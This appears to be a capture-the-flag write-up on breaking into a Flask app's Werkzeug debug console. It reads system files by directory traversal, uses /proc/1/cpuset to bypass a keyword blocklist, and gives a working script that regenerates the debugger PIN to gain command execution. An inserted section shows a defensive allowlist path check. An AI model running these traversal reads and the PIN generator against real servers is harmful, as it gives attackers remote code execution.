Reading the challenge
Open the environment and visit the page as the hint says; the page shows that the strings cgroup, flag and self are filtered out of the request.
![](https://img-blog.csdnimg.cn/img_convert/9e4af016d7d14118ab72afaeab243f43.png)
Trigger an error on the page, which reveals that the Werkzeug debug console is enabled.
![](https://img-blog.csdnimg.cn/img_convert/9508b2452bfb48c4abae8f9e7c2f190f.png)
The console then asks for a PIN code.
![](https://img-blog.csdnimg.cn/img_convert/286c0eac63184abaab66d262caac0a77.png)
The GET request allows directory traversal, so the next step is to read the files whose contents the PIN is derived from and generate the PIN from them:

- username (/etc/passwd)
- path of app.py (obtained from the error page)
- MAC address (/sys/class/net/eth0/address or /sys/class/net/ens33/address)
- machine-id (/etc/machine-id)
- cpuid (/proc/self/cgroup); the challenge bans self and cgroup, so /proc/1/cpuset can be used instead. For the specific reason, see this article -> here
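The filter described above is a substring blocklist, which is exactly why an equivalent path such as /proc/1/cpuset still gets through. As an added example (not part of the original writeup or the challenge code), the following contrasts that weak check with the one a defender should use for a file-serving endpoint: resolve the requested path and allow it only if it stays under a fixed base directory. The base directory, the function names and the exact blocklist words are my own assumptions reconstructed from the writeup.

```python
import os
import tempfile
from typing import Optional

# Hypothetical directory the file-reading endpoint is allowed to serve from
BASE_DIR = "/srv/app/public"

# The substring blocklist the challenge used (reconstructed from the writeup)
BLOCKED_WORDS = ("cgroup", "flag", "self")


def blocklist_allows(requested: str) -> bool:
    """The weak check: rejects only paths containing a banned substring."""
    return not any(word in requested for word in BLOCKED_WORDS)


def allowlist_allows(requested: str, base_dir: str = BASE_DIR) -> bool:
    """The robust check: the resolved path must stay inside base_dir.

    os.path.join discards base_dir when `requested` is absolute, and
    realpath collapses '..' and symlinks, so both traversal styles end
    up outside base_dir and are rejected by the commonpath comparison.
    """
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    return os.path.commonpath([base, candidate]) == base


def serve_file(requested: str, base_dir: str = BASE_DIR) -> Optional[bytes]:
    """Read the file only after the allowlist check passes; None means rejected."""
    if not allowlist_allows(requested, base_dir):
        return None
    with open(os.path.join(os.path.realpath(base_dir), requested), "rb") as fh:
        return fh.read()


def demo() -> dict:
    """Self-contained run against a constructed temporary directory."""
    with tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(tmp, "notes.txt"), "wb") as fh:
            fh.write(b"hello")  # constructed sample file
        return {
            "inside": serve_file("notes.txt", tmp),
            "traversal": serve_file("../../etc/passwd", tmp),
            "absolute": serve_file("/proc/1/cpuset", tmp),
        }


if __name__ == "__main__":
    print(blocklist_allows("/proc/1/cpuset"))   # True: the blocklist is bypassed
    print(allowlist_allows("/proc/1/cpuset"))   # False: outside the base directory
    print(demo())
```

The point of the comparison is that the allowlist version never needs to know which files are sensitive: anything that does not resolve to a location under the base directory is refused, whether it arrives via `..`, an absolute path, or a symlink.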
Getting the username
![](https://img-blog.csdnimg.cn/img_convert/58da8a8f9e194152a65e3e860a4d895e.png)
We get app
Getting the app.py path
![](https://img-blog.csdnimg.cn/img_convert/1ef184ab4eaf4e1185586e2ba6cfd6cb.png)
We get /usr/local/lib/python3.8/site-packages/flask/app.py
Getting the MAC address
![](https://img-blog.csdnimg.cn/img_convert/eb8a589e091b48b486c266a01b225030.png)
Note that the address has to be converted: strip the colons and interpret the hex string as a decimal integer, which is what uuid.getnode() returns on the target.

```python
addr = '02:42:ac:02:0b:64'
print(int(addr.replace(':', ''), 16))
```

We get 2485376912228
Getting the machine-id
![](https://img-blog.csdnimg.cn/img_convert/23f69ac0a969401c953badac59c27fb9.png)
We get 7265fe765262551a676151a24c02b7b6
Getting the cpuid
![](https://img-blog.csdnimg.cn/img_convert/9036d63c574041d19ab42db7172dcb5b.png)
We get cd4b392caf6a02636f16f97b830f3b5564d27d7a2985edeedca7582fa6d23114
Concatenate machine-id and cpuid:
7265fe765262551a676151a24c02b7b6cd4b392caf6a02636f16f97b830f3b5564d27d7a2985edeedca7582fa6d23114
Run the script to get the PIN; any of the scripts found online will do. The one I used (it mirrors the get_pin_and_cookie_name logic in Werkzeug's debugger):

```python
import hashlib
from itertools import chain

# Values recovered from the target via directory traversal and the error page
probably_public_bits = [
    'app',  # username, from /etc/passwd
    'flask.app',  # modname
    'Flask',  # getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python3.8/site-packages/flask/app.py',  # getattr(mod, '__file__', None)
]
private_bits = [
    '2485376912228',  # str(uuid.getnode()), decimal form of /sys/class/net/eth0/address
    '7265fe765262551a676151a24c02b7b6cd4b392caf6a02636f16f97b830f3b5564d27d7a2985edeedca7582fa6d23114',  # get_machine_id(): /etc/machine-id + /proc/1/cpuset
]

h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode("utf-8")
    h.update(bit)
h.update(b"cookiesalt")
cookie_name = f"__wzd{h.hexdigest()[:20]}"

# If we need to generate a pin we salt it a bit more so that we don't
# end up with the same value and generate out 9 digits
num = None
if num is None:
    h.update(b"pinsalt")
    num = f"{int(h.hexdigest(), 16):09d}"[:9]

# Format the pincode in groups of digits for easier remembering if
# we don't have a result yet.
rv = None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = "-".join(
                num[x : x + group_size].rjust(group_size, "0")
                for x in range(0, len(num), group_size)
            )
            break
    else:
        rv = num

print(rv)
```

Generated PIN: 155-314-265
Entering the console
Import os and run system commands. I was careless here: at first I did not notice the trailing + sign, and could not read anything out of the flag file...
![](https://img-blog.csdnimg.cn/img_convert/d2e01cf119d143898d2c7baf9e605f90.png)
The real flag is in the readflag file...
![](https://img-blog.csdnimg.cn/img_convert/22546ec8ad134743914bf81388120596.png)
![](https://img-blog.csdnimg.cn/img_convert/01815e1ad292490a8a4d22a387a9d28a.png)
We get the flag:
HSCSEC{45035c7e-1eb5-452f-8356-2fc000e3d2b4}